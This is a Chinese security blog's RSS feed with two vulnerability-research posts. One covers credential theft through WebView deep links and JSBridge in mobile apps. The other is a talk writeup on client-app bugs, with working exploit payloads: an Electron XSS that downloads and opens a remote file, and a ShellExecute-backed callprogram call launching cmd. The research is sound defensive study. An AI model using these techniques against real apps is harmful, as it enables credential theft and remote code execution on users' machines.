<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Chen's Blog</title>
    <description>Chen's Blog，分享安全领域的所思、所想、所学。</description>
    <link>https://gh0st.cn</link>
    
      
        <item>
          <title>黑盒视角下的 WebView 漏洞面探索</title>
          <description>&lt;h1 id=&quot;黑盒视角下的-webview-漏洞面探索&quot;&gt;黑盒视角下的 WebView 漏洞面探索&lt;/h1&gt;

&lt;h2 id=&quot;前言&quot;&gt;前言&lt;/h2&gt;

&lt;p&gt;本文主要记录了在移动端探索 WebView 组件漏洞的过程，采用黑盒视角，摒弃复杂繁琐的内部逻辑分析，专注于快速且直接的漏洞挖掘方法。由于笔者才疏学浅，因此本文难免会出现一些文笔不通或专业解释不到位的情况，还望多包涵及斧正。&lt;/p&gt;

&lt;h2 id=&quot;webview-组件&quot;&gt;WebView 组件&lt;/h2&gt;

&lt;h3 id=&quot;介绍&quot;&gt;介绍&lt;/h3&gt;

&lt;p&gt;顾名思义，WebView 组件是用于在应用程序中嵌入和展示 Web 内容的系统组件。通过调用 WebView，开发者能够实现在自己的应用中直接渲染网页，这从某种程度上极大地简化了跨平台应用的开发流程。利用 WebView，开发者只需进行少量适配工作，即可将现有的 Web 应用无缝移植到移动应用环境中，显著提升了开发效率和灵活性。&lt;/p&gt;

&lt;h3 id=&quot;场景&quot;&gt;场景&lt;/h3&gt;

&lt;p&gt;WebView 组件实际上无处不在。例如，在手机上打开一个商城 APP 时，展示的商品信息可能本质上就是通过 WebView 加载和渲染的网页。在这些实际应用场景中，用户通常不会察觉到 WebView 的存在，并且所有显示的信息可能都是由 APP 预先配置好的。&lt;/p&gt;

&lt;h2 id=&quot;漏洞入口&quot;&gt;漏洞入口&lt;/h2&gt;

&lt;p&gt;要想让用户手机上的 APP 调用 WebView 组件对自定义页面进行渲染，方法主要分为两种：&lt;strong&gt;第一类是国内常见的二维码扫码，通过扫描一个指向网页链接的二维码，从而直接调用 WebView 加载特定网页；第二类是 APP 间的跳转调用，即 URL Scheme（在安卓上也称为 Deep Link），通过这种方式可以从一个 APP 直接跳转到另一个 APP 中的特定页面，而这个页面同样可能是通过 WebView 来渲染的。&lt;/strong&gt;&lt;/p&gt;

&lt;h3 id=&quot;二维码扫描&quot;&gt;二维码扫描&lt;/h3&gt;

&lt;p&gt;APP 上的二维码扫码功能通常作用于用户界面的左右上角，如果找不到的话则可以在 APP 的设置页面中找到“扫一扫”、“扫码”等字眼就可以打开相关功能。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2025-12-26/0.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;url-scheme-跳转&quot;&gt;URL Scheme 跳转&lt;/h3&gt;

&lt;p&gt;关于 URL Scheme，对于我来说就是老熟人了，在 2018 年的时候就在博客里浅浅的分享了一下，有兴趣可以看下：https://gh0st.cn/archives/2018-12-08/1。&lt;/p&gt;

&lt;p&gt;这里简单说明下，URL Scheme 实际上是应用程序在操作系统层面注册的一种自定义协议格式，它允许 APP 定义特定的协议名，并在 APP 内定义路由和接收参数来完成某些功能，与我们所理解的 HTTP 协议形式的 URL 地址没有什么本质区别。当其他应用或浏览器尝试通过这种自定义协议发起请求时，系统能够识别并定位到相应的应用程序，然后传递所访问的功能路由和参数信息给该应用进行处理。&lt;/p&gt;

&lt;p&gt;在 iOS 和 Android 上，对于 URL Scheme 的支持是不一样的，例如在 iOS 上的 Safari 浏览器的地址栏中直接输入 URL Scheme 则可以完成跳转调用。而 Android 默认浏览器下，用同样的方式则会提示找不到网页，因此想要调用 URL Scheme 就需要借助 JavaScript（location 跳转）或 HTML（a 标签 href 点击指向）的方式，在 iOS 上也可以用这种方式。&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;a href=&quot;xapp://page?url=https://gh0st.cn&quot;&amp;gt;Click&amp;lt;/a&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2025-12-26/1.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;实战案例&quot;&gt;实战案例&lt;/h2&gt;

&lt;p&gt;基于以上所述的两种攻击入口，我发现了许多 APP 上的漏洞，可以通过 WebView 组件直接获取用户凭证。&lt;/p&gt;

&lt;h3 id=&quot;webview-访问&quot;&gt;WebView 访问&lt;/h3&gt;

&lt;p&gt;访问获取凭证是 WebView 组件漏洞面的最基本漏洞，通过扫描二维码或 URL Scheme 跳转调用 WebView 组件打开指定的 URL 地址，接着由于 APP 为设限或存在绕过的情况下，WebView 内访问指定的 URL 地址时会携带凭证信息。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;为什么 WebView 内访问可以携带凭证？&lt;/strong&gt; 因为当前 APP 的设计架构采用 Native UI 与 WebView 相结合的方式，以兼顾性能体验与业务灵活性，支持更丰富的应用场景，因此在 APP 上进行登录后，APP 在 WebView 的应用场景下也会携带登录凭证。&lt;/p&gt;

&lt;h4 id=&quot;二维码扫描-1&quot;&gt;二维码扫描&lt;/h4&gt;

&lt;p&gt;关于二维码扫描的方式比较简单找到入口，如上文所说在 APP 那找到对应功能点即可。以下图所示，图中所展示的案例就是最经典的二维码扫描入口进入 WebView 组件，访问时携带了凭证到达指定 URL 地址。（可以将 URL 地址设为 BurpSuite Collaborator 的地址或类似有 HTTP Log 记录的地址）&lt;/p&gt;

&lt;p&gt;如图所示案例实际上有个细节，如二维码内容处打码的部分即为白名单域名，可以通过抓包或知道 APP 归属的域名方式获取该部分。很多 APP 使用 WebView 组件进行访问时，会判断当前访问的页面 URL 地址中的域名部分，有些 APP 在此处判断时比较宽松，例如判断域名是否包含某域名。因此可以通过一些格式对此进行绕过，如：&lt;code&gt;http://白名单域名.HTTPLog.com&lt;/code&gt;、&lt;code&gt;http://白名单域名@HTTPLog.com&lt;/code&gt;。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2025-12-26/2.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h4 id=&quot;url-scheme-跳转-1&quot;&gt;URL Scheme 跳转&lt;/h4&gt;

&lt;p&gt;URL Scheme 按常规逻辑需要通过工具查看 APP 所声明的信息，APK 格式就是文件内的 &lt;code&gt;AndroidManifest.xml&lt;/code&gt; 文件，IPA 格式就是文件内的 &lt;code&gt;Info.plist&lt;/code&gt; 文件。但是本文不做偏逆向/白盒侧的分享，从黑盒角度出发获取 URL Scheme。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;为什么可以从黑盒出发获取 URL Scheme？&lt;/strong&gt; 还是回到 Native UI 与 WebView，因为 WebView 会去访问一些业务/功能页面，因此开发也会在 WebView 网站中去写入 APP 的 URL Scheme 信息，从而调起 APP 内的一些 Native 功能，因此只要可以进行抓包即可通过正则匹配的方式获取到完整的 URL Scheme 信息。&lt;/p&gt;

&lt;p&gt;如下图所示案例逻辑为：&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;通过笔者所开发的 HaE 工具配合 BurpSuite 进行抓包，规则就会获取到抓包过程中所出现的 URL Scheme 信息：&lt;code&gt;xxx://clause/WebView?url=&lt;/code&gt;。&lt;/li&gt;
  &lt;li&gt;得到该信息之后，将其中的 url 参数设为 HTTPLog 地址：&lt;code&gt;xxx://clause/WebView?url=http://HTTPLog.com&lt;/code&gt;。&lt;/li&gt;
  &lt;li&gt;在 iOS 环境下即可通过浏览器复制构建好的地址直接打开然后跳转到 APP 内的 WebView 访问界面。在 Android 环境下，则可以按上文中提到的 HTML 代码方式进行。&lt;/li&gt;
  &lt;li&gt;最后在 HTTPLog 服务中即可查看是否获取到了凭证信息，如果没有也可以尝试绕过，与二维码扫描处的绕过逻辑是一样的。&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;img src=&quot;/images/2025-12-26/3.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;jsbridge-获取&quot;&gt;JSBridge 获取&lt;/h3&gt;

&lt;h4 id=&quot;逻辑与发现&quot;&gt;逻辑与发现&lt;/h4&gt;

&lt;p&gt;JSBridge 是一种在 App 中实现 JavaScript 与 Native 代码通信的技术方式，可以将 Web 页面中的 JavaScript 调用映射到原生功能中。很多 APP 在使用 JSBridge 映射 JavaScript 与 Native 方法时，未对调用来源的域（Origin）进行校验或白名单限制，导致任意网页或第三方脚本均可通过 JavaScript 直接调用注册的 Native 接口。&lt;/p&gt;

&lt;p&gt;这些被注册的接口，可以是全局变量、方法、对象等类型。在 JavaScript 中全局实际上就是窗口对象 Window。也就意味着这些接口都会被注册到 Window 下面。因此，只要进入到 WebView 组件内就可以通过遍历 Window 全局对象的方式来找到被 APP 所注册的接口。&lt;/p&gt;

&lt;p&gt;如下代码所示就是一个简易的 Window 全局对象遍历代码。它的缺点很明显，如图所示会将浏览器/组件自带的一些方法遍历出来，因此就需要加入输出过滤功能，从而帮助我们更方便的进行 APP 注册接口的寻找。&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;body&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;script&amp;gt;
    Object.keys(window).forEach(key =&amp;gt; { document.body.innerHTML += `&amp;lt;pre&amp;gt;${key}:${window[key]}&amp;lt;/pre&amp;gt;`; });
&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;h4 id=&quot;凭证获取&quot;&gt;凭证获取&lt;/h4&gt;

&lt;p&gt;依旧使用 HaE 的规则通过抓包的方式来获取到 WebView 的 URL Scheme 信息：&lt;code&gt;xxx://promotion/web&lt;/code&gt;，有些 URL Scheme 信息需要分析业务 JavaScript 文件中的逻辑，如图所示在基础的 URL 信息上还有一个参数 &lt;code&gt;url&lt;/code&gt;：&lt;code&gt;xxx://promotion/web?url=&lt;/code&gt;。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2025-12-26/4.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;如下图所示案例逻辑为：&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;编写 A 标签跳转页面，用于指定 WebView 组件跳转页面：&lt;code&gt;&amp;lt;a href=&quot;xxx://promotion/web?url=http://可信域名.attack.com/WebView/0.html&quot;&amp;gt;Click Me&amp;lt;/a&amp;gt;&lt;/code&gt;。&lt;/li&gt;
  &lt;li&gt;打开跳转页面点击 A 标签，调用起目标 APP 的 WebView 组件访问自动化遍历脚本页面，分析发现 &lt;code&gt;czbInfo.getAppInfo&lt;/code&gt; 方法可以获取凭证。&lt;/li&gt;
  &lt;li&gt;构建 JavaScript 外带代码用于验证凭证可以经过网络进行远程获取。&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;img src=&quot;/images/2025-12-26/5.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;总结与思考&quot;&gt;总结与思考&lt;/h2&gt;

&lt;p&gt;本文从黑盒测试的视角，梳理了针对移动端 WebView 组件的漏洞挖掘路径。但是 WebView 组件不仅仅是移动端的特有产物，随着类 CEF （Chromium嵌入式框架）/ 类 Electron 框架的出现，PC客户端也同样面临着 WebView 组件攻击风险。&lt;/p&gt;

&lt;p&gt;抛出两个思考：除了获取凭证外是否存在其他更高维度的利用面？除了APP自身校验缺陷外是否存在系统层的校验不严格问题？&lt;/p&gt;
</description>
          <pubDate>2025-12-26T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2025-12-26/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2025-12-26/1</guid>
        </item>
      
    
      
        <item>
          <title>被忽视的暗面：客户端应用漏洞挖掘之旅</title>
          <description>&lt;h1 id=&quot;被忽视的暗面客户端应用漏洞挖掘之旅&quot;&gt;被忽视的暗面：客户端应用漏洞挖掘之旅&lt;/h1&gt;

&lt;h2 id=&quot;前言&quot;&gt;前言&lt;/h2&gt;

&lt;p&gt;在2023年12月15日，我有幸参加了由“字节跳动安全中心”举办的“安全范儿”沙龙活动。作为“中孚信息元亨实验室”的一员，我被邀请分享名为“被忽视的暗面：客户端应用漏洞挖掘之旅”的技术议题。&lt;/p&gt;

&lt;p&gt;客户端应用漏洞是许多人在进行漏洞挖掘和安全测试时容易忽视的领域。随着技术的更迭和攻防手段的升级，客户端应用漏洞也逐渐出现在大众视野中（APT攻击、攻防赛事等等），在本次议题中，我们将重点关注PC侧的客户端应用程序，如即时通讯、远程服务、视频软件等应用，探索其中存在的漏洞和潜在的安全风险。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17026451662626.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;漏洞案例&quot;&gt;漏洞案例&lt;/h2&gt;

&lt;p&gt;漏洞案例的分析主要分为两类，一是常规风险的介绍和了解，二是RCE漏洞的挖掘思路和手法。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;注意：以下漏洞案例均通过脱敏和细节上的处理。&lt;/strong&gt;&lt;/p&gt;

&lt;h3 id=&quot;常规风险篇&quot;&gt;常规风险篇&lt;/h3&gt;

&lt;p&gt;常规风险在这里我分为这几类：信息泄露、白利用、逻辑校验、缓冲区溢出。&lt;/p&gt;

&lt;h4 id=&quot;信息泄漏&quot;&gt;信息泄漏&lt;/h4&gt;

&lt;p&gt;对于客户端的信息泄露，我一开始采用的方式就是基于IDA Strings进行敏感的字符串信息匹配，将HaE的规则转为Yara规则再通过FindCrypt3插件进行匹配。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17026453007764.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;实际效果没有那么好，仅有一些数据库的连接配置信息泄露，并且由于是基于IDA的也没有那么好的进行自动批量化发现。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17028731522870.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17028731780708.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;我们可以借助&lt;code&gt;Strings&lt;/code&gt;工具来快速的获取可执行文件的字符串内容，并通过正则或其他方式进行匹配。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17028736490974.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h4 id=&quot;白利用&quot;&gt;白利用&lt;/h4&gt;

&lt;p&gt;白利用问题就老生常谈了，在红队的工作中也经常遇到，如DLL文件没有经过比对导致的劫持问题、带有签名的程序可以通过参数的方式执行任意命令。因此在这里就不过多的赘述了。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17028738382826.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17028738618693.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h4 id=&quot;逻辑校验&quot;&gt;逻辑校验&lt;/h4&gt;

&lt;p&gt;很多客户端程序在对用户信息进行获取的时候会通过内存的方式，来获取用户的编号，从而基于此进一步来获取用户的信息。然而这种方式并不是完全可信的，我们可以通过CE来对内存进行修改，从而导致越权漏洞的产生。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17028740063948.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这类问题很经典，在以往就有许多案例（wooyun-2015-0143395、wooyun-2014-048606），但现在仍然可以从一些主流的应用上发现到类似的安全问题。&lt;/p&gt;

&lt;h4 id=&quot;缓冲区溢出&quot;&gt;缓冲区溢出&lt;/h4&gt;

&lt;p&gt;缓冲区溢出问题太多太多了，我们可以通过通过IDA插件VulFi定位脆弱点，很轻松的在一些客户端应用上找到堆、栈溢出问题。除此之外，也可以通过Boofuzz来对客户端应用开启的本地网络服务进行Fuzz，从而找到溢出问题。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17028745014755.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;除了本地网络服务以外，最经典的、利用最多的还是特定文件格式处理客户端，如常用的Word、Excel。我在实际挖掘的过程中找到了一些图片处理的客户端程序，它用于各种各样的图片处理，我们可以找一些比较不常见的图片格式，并且通过网盘资源找到一些样本文件，丢给GPT或IFFA来分析文件格式，并输出Pits脚本，通过Peach Fuzzer来进行Fuzz工作。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17028747262213.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;rce篇&quot;&gt;RCE篇&lt;/h3&gt;

&lt;p&gt;接着我们来到RCE篇，请注意这里的RCE并不是Pre Auth的，案例中提到的大多需要1 Click进行交互才能利用。但也不是绝对，如果一些客户端的网络服务端口是监听在0.0.0.0的，只要你与目标机器处于同一个网络，或该客户端是在服务器上使用的，也一样可以实现0 Click的效果。&lt;/p&gt;

&lt;h4 id=&quot;web类客户端&quot;&gt;Web类客户端&lt;/h4&gt;

&lt;p&gt;Web类客户端，我的定义是基于HTML、CSS、JS等Web前端技术所构建的客户端应用程序，如Electron这类CEF（浏览器嵌入式）框架开发的客户端应用，以及基于渲染引擎（如Wke）所开发的客户端应用。&lt;/p&gt;

&lt;h5 id=&quot;某im客户端应用&quot;&gt;某IM客户端应用&lt;/h5&gt;

&lt;p&gt;如下图所示，是一个即时通讯客户端应用，我在群名称重命名时发现了一个反射XSS漏洞，根据其目录结构我知道它是一个基于Electron开发的程序。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17028753704726.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;在Electron框架下，如果开发者在渲染页面时配置&lt;code&gt;nodeIntegration&lt;/code&gt;为true，则说明我们可以在前端中使用Nodejs的语法，这就导致我们可以直接在前端使用如下Nodejs代码执行命令：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-nodejs&quot;&gt;require(&apos;child_process&apos;).exec(...);
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;但是这个配置项在创建功能窗口时并没有开启：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/image019.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;所以，我们也就没办法通过XSS执行Nodejs的代码，但是根据当前的Electron的版本1.8.7去互联网检索，发现这个版本存在一个历史漏洞：CVE-2018-15685，而后进行相关验证，也无法成功。&lt;/p&gt;

&lt;p&gt;但是我们在&lt;code&gt;\resources\app\src\inject\preload.js&lt;/code&gt;文件中（这是预加载JS，也就表示这个文件在窗口创建后，页面创建前就执行了），发现了注册的全局变量：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-javascript&quot;&gt;window.ZxDesktop = ZxDesktop;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;所以我们可以直接去调用这个全局变量，从而去使用其内部的定义的一些功能：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17028758518853.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;该全局变量实际上导出了很多其他模块及对应方法：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/image025.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;我们跟进File模块，就可以发现存在一个open函数：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/image027.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;跟进代码和测试之后，发现它就是文件打开函数，在Console下去调用，成功打开计算器：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/image029.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;接着看导出函数列表的其他项，发现存在两个文件保存的方法：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/image031.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;而它们所指向的都是另外一个模块的方法：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-javascript&quot;&gt;const Download = require(&apos;../download_extra/download.render.js&apos;);
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;跟进这个模块，发现实际上他们都来自同一个方法，只不过传递的参数isSelect有不同：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/image033.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;接着我们来完整的阅读下代码即可发现整个逻辑，首先根据你传递的参数来判断要调用NormalDownload（正常下载）还是ChunkDownload（分块下载），接着根据isSelect函数来判断调用save还是saveAs方法：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/image035.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;所以我们仍然需要跟进NormalDownload或ChunkDownload对应的代码，来查看它们这些方法的逻辑是什么，这里看了之后，两者代码的唯一区别就是分块，所以本文就以NormalDownload的save、saveAs方法去说明。&lt;/p&gt;

&lt;p&gt;首先是saveAs方法，它会调用一个文件保存框，然后赋值调用retryStart方法：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/image037.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;而实际上retryStart方法内调用的是start方法，这个方法是用来进行请求下载的：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/image039.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;而后下载的文件实际上会保存在用户的数据目录下，save方法与saveAs方法的最大的不同就是没有这个文件保存框，所以我们当然选择使用save方法。&lt;/p&gt;

&lt;p&gt;需要注意，在如上代码中save和saveAs的传递参数不一致，其实这不影响最终的处理，因为在一开始的对象创建时候就通过构造函数赋值了：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-javascript&quot;&gt;let downloader = new Download(file, config);
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/image041.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;至此，我们就获得了文件下载的攻击路径，我们可以根据对应参数这样构建JS代码：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-javascript&quot;&gt;ZxDesktop.require(&quot;File&quot;).save({&quot;url&quot;: &quot;http://gh0st.cn:81/test.txt&quot;,&quot;name&quot;: &quot;test.txt&quot;,&quot;path&quot;: &quot;&quot;,&quot;chunkSize&quot;: &quot;&quot;,&quot;size&quot;: &quot;&quot;,&quot;fileData&quot;: &quot;&quot;});
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;我们已经获得了文件下载的功能，攻击路径就很明显了：用户下载文件，打开文件。但是实际操作中，我们打开文件还缺少一个路径，并且在实际的测试中，默认情况下，下载的文件是会保存在应用的数据目录的null目录下。&lt;/p&gt;

&lt;p&gt;而这个目录可能会被用户更改（用户名也没法获取），所以我们需要搭配一个点去获取路径，在这里找到了ZxDesktop的System模块：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/image045.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;它的导出列表中有两个属性：dbPath、userDataPath，它们的内容都是一样的，指向了用户的数据目录：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-javascript&quot;&gt;ZxDesktop.require(&quot;System&quot;).userDataPath
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;我们可以这样拼接，就有了下载文件的目录信息了：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-javascript&quot;&gt;ZxDesktop.require(&quot;System&quot;).userDataPath + &quot;/null/test.txt&quot;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;当我们满足所有条件后，就可以构造完整的攻击代码了：&lt;/p&gt;

&lt;p&gt;1.下载文件：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-javascript&quot;&gt;var a = ZxDesktop;

var b = a.require(&quot;File&quot;);

b.save({&quot;url&quot;: &quot;http://gh0st.cn:81/test.txt&quot;,&quot;name&quot;: &quot;test.txt&quot;,&quot;path&quot;: &quot;&quot;,&quot;chunkSize&quot;: &quot;&quot;,&quot;size&quot;: &quot;&quot;,&quot;fileData&quot;: &quot;&quot;});
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;2.拼接文件路径，打开文件：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-javascript&quot;&gt;b.open(a.require(&quot;System&quot;).userDataPath + &quot;/null/test.txt&quot;);
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;3.最终Exploit：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&quot;&amp;gt;&amp;lt;svg onload=&apos;var a = ZxDesktop;var b = a.require(&quot;File&quot;);b.save({&quot;url&quot;: &quot;http://gh0st.cn:81/test.txt&quot;,&quot;name&quot;: &quot;test.txt&quot;,&quot;path&quot;: &quot;&quot;,&quot;chunkSize&quot;: &quot;&quot;,&quot;size&quot;: &quot;&quot;,&quot;fileData&quot;: &quot;&quot;});b.open(a.require(&quot;System&quot;).dbPath + &quot;/null/test.txt&quot;);&apos;&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17028761314895.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h5 id=&quot;某运维平台客户端&quot;&gt;某运维平台客户端&lt;/h5&gt;

&lt;p&gt;在某运维平台客户端中，我们发现可以通过伪协议链接（&lt;code&gt;xxx://webview/?url=http://xxxx&lt;/code&gt;）来达到端内任意页面加载，这也就表示我们可以执行任意JS代码。&lt;/p&gt;

&lt;p&gt;根据加载的DLL文件得知，其所依赖的前端页面渲染是开源项目&lt;a href=&quot;https://github.com/cexer/wke&quot;&gt;Wke&lt;/a&gt;。&lt;/p&gt;

&lt;p&gt;在源代码&lt;code&gt;wke/jsBind.cpp&lt;/code&gt;中，发现wkeJSBindFunction方法提供了JSBridge的功能，将JavaScript函数绑定到C++中一个本地函数。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17028764422964.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;基于IDA分析得知，目标应用使用了该方法将JS函数与C++函数进行了绑定。图下图所示，其将C++某个函数地址，与名为callprogram的JavaScript函数进行绑定，我们可以直接在JS代码中调用。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17028765186722.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;跟进对应的C++函数，我们发现它会通过wkeJSParam获取参数，再通过JSToTempStringW获取字符串形式的参数值，最终将两个参数带入ShellExecuteW函数执行。即最终执行的代码为：&lt;code&gt;ShellExecuteW(0, &quot;open&quot;, 参数1, 参数2, 0, 1)&lt;/code&gt;。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/17028765625148.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;因此我们可以构建如下的Exploit代码，并通过伪协议的方式使目标可以打开包含Exp代码的网页：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-html&quot;&gt;&amp;lt;script&amp;gt;callprogram(&quot;C:/Windows/System32/cmd.exe&quot;, &quot;/c calc&quot;);&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;h4 id=&quot;传统类客户端&quot;&gt;传统类客户端&lt;/h4&gt;

&lt;p&gt;传统类客户端，我的定义是基于C/C++写的一些传统应用，如VPN客户端、视频软件、远程控制软件等偏生活、日常类的应用。&lt;/p&gt;

&lt;h5 id=&quot;某远程服务平台客户端&quot;&gt;某远程服务平台客户端&lt;/h5&gt;

&lt;p&gt;在拿到一个客户端程序时，第一步是安装，第二步则应该是先大致去了解该程序的一些目录结构、运行环境等信息，这样我们在接下来的漏洞挖掘中才会有更多的信息来进行关联，辅助我们挖掘漏洞。&lt;/p&gt;

&lt;p&gt;如下图所示，安装完某远程服务平台客户端后，我通过火绒剑逐个查看对应的进程信息，在TCP/IP窗口中看见当前进程的网络通信或监听信息。如下图所示就是&lt;code&gt;UserClient.exe&lt;/code&gt;进程当前的网络通信信息，我们可以看到它在本地监听了两个端口：&lt;code&gt;38227&lt;/code&gt;、&lt;code&gt;38230&lt;/code&gt;。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/16679755790172.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;它的协议都是TCP，我们可以尝试使用HTTP的方式去访问，结果显示&lt;code&gt;38230&lt;/code&gt;端口可以以HTTP协议的方式进行访问。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/16679844917231.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;我们可以选取响应报文中的&lt;code&gt;bangwo8client&lt;/code&gt;字符串在IDA的Strings窗口中进行搜索，通过这样的方式来进行逻辑的回溯。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2023-12-18/16679850207168.jpg&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

